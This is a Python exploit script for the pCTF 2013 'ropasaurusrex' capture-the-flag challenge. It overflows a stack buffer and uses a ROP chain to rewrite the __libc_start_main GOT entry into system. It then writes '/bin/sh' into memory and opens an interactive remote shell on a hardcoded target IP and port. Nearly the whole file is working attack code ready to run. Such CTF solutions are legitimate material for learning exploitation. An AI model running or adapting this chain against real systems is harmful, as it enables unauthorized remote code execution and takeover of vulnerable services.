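#!/usr/bin/env python2
# pCTF 2013 -- ropasaurusrex (200)
# mak - DragonSector
#
# Stack overflow -> ROP. The chain never leaks an address: it patches the
# already-resolved __libc_start_main GOT entry *in place* by adding the constant
# (system - __libc_start_main) to it with an "add dword [ebx+0x5D5B04C4], eax"
# gadget, assembles "/bin/sh\0" in writable memory the same way, and finally
# calls __libc_start_main@plt, which now lands in system("/bin/sh").
# Written for Python 2; bytes literals keep it running under Python 3 as well.
import socket
import sys
from struct import pack, unpack

# libc offsets used to turn the resolved __libc_start_main pointer into system.
# These are for the remote libc; the earlier pair 0x3e6c0 / 0x196d0 that was
# left commented out presumably belonged to a different build -- confirm against
# the target's libc before reuse.
system_off = 0x0039450
__libc_start_off = 0x0016bc0

# GOT slot of __libc_start_main (presumably -- it is the dword the chain
# rewrites, and 0x804831c below is the PLT stub that jumps through it).
# Must be writable: the technique needs a binary without full RELRO.
__libc_start_plt = 0x8049618
# Writable dword pair where "/bin/sh\0" is assembled; passed to system().
data_off = 0x08049010

# Gadgets (static binary addresses, no PIE).
POP4_RET = 0x080484b5   # pop ebx ; pop esi ; pop edi ; pop ebp ; ret
XCHG_ADD = 0x080483bb   # xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret
ADD_BIAS = 0x5D5B04C4   # displacement baked into the add gadget
LIBC_START_PLT_STUB = 0x804831c  # __libc_start_main@plt
EIP_OFFSET = 140        # bytes of buffer before the saved return address

DEFAULT_HOST = '54.234.151.114'
DEFAULT_PORT = 1025


def p32(value):
    """Pack *value* as a little-endian 32-bit word.

    Negative values wrap (two's complement), so ``p32(target - ADD_BIAS)``
    works without caring about sign. Explicit ``<I`` instead of native ``I``
    keeps the chain correct if the script is run from a non-x86 host.
    """
    return pack('<I', value & 0xffffffff)


def add_dword(target, delta):
    """Return a ROP fragment that performs ``*(uint32_t *)target += delta``.

    POP4_RET loads ebx = target - ADD_BIAS (so ebx+ADD_BIAS hits *target*) and
    esi = the value to add; edi/ebp receive junk. XCHG_ADD then moves esi into
    eax, does ``add al, 8`` and performs the memory add.

    ``add al, 8`` is 8-bit and never carries into ah, so the value loaded into
    esi is *delta* with only its low byte pre-decremented by 8. The plain
    ``delta - 8`` used by the hand-written chain is only right when
    ``delta & 0xff >= 8``; this form is right for any delta and is
    byte-identical for the three deltas this exploit uses.
    """
    esi = (delta & 0xffffff00) | ((delta - 8) & 0xff)
    return b"".join([
        p32(POP4_RET),
        p32(target - ADD_BIAS),   # ebx
        p32(esi),                 # esi -> eax
        b"A" * 4 + b"B" * 4,      # edi, ebp: don't care
        p32(XCHG_ADD),
    ])


def build_rop():
    """Build the chain: GOT fixup, then write "/bin/sh\\0" at data_off.

    The two data writes are *adds*, so the subtrahends are the dwords assumed
    to already sit at data_off (0x00030002) and data_off+4 (0x00000001) --
    presumably values from the binary's data segment; confirm against the
    target ELF if the string ever comes out garbled.
    """
    rop = add_dword(__libc_start_plt, system_off - __libc_start_off)
    rop += add_dword(data_off, unpack('<I', b"/bin")[0] - 0x00030002)
    rop += add_dword(data_off + 4, unpack('<I', b"/sh\x00")[0] - 0x00000001)
    return rop


def build_payload():
    """Return the full overflow buffer: padding, ROP chain, final system() call.

    After the chain comes an ordinary call frame for __libc_start_main@plt
    (now system): return address 0xdeadbeef (never returned to) and data_off
    as the single argument. The trailing "C"s add 0x112 bytes, presumably to
    fill out the size the vulnerable read() expects -- kept as in the original.
    """
    payload = b"A" * EIP_OFFSET        # up to the saved EIP
    payload += build_rop()             # first gadget address overwrites EIP
    payload += p32(LIBC_START_PLT_STUB)
    payload += p32(0xdeadbeef)         # fake return address for system()
    payload += p32(data_off)           # argv: "/bin/sh"
    payload += b"C" * 0x112
    return payload


def interact(host, port):
    """Deliver the payload and hand the resulting shell to the user."""
    # Lazy import: telnetlib was removed from the stdlib in Python 3.13
    # (PEP 594); importing it here keeps build_payload() importable anywhere.
    import telnetlib
    tl = telnetlib.Telnet(host, port)
    tl.write(build_payload())
    tl.interact()


def send_raw(host, port):
    """Non-interactive variant: send the payload once and print the reply.

    This is the original's commented-out plain-socket path, kept for
    debugging when an interactive session is not wanted.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
        s.sendall(build_payload())
        print(s.recv(0x1000))
    finally:
        s.close()


def main(argv):
    """usage: ropasaurusrex.py [host [port]] [--raw] [--dump]

    Defaults to the original CTF target. ``--raw`` uses send_raw() instead of
    an interactive telnet session; ``--dump`` writes the payload to a file
    named ``crash`` (the original's debugging line) and does not connect.
    """
    positional = [a for a in argv[1:] if not a.startswith('--')]
    host = positional[0] if positional else DEFAULT_HOST
    port = int(positional[1]) if len(positional) > 1 else DEFAULT_PORT

    if '--dump' in argv:
        with open('crash', 'wb') as fh:
            fh.write(build_payload())
    elif '--raw' in argv:
        send_raw(host, port)
    else:
        interact(host, port)


if __name__ == "__main__":
    main(sys.argv)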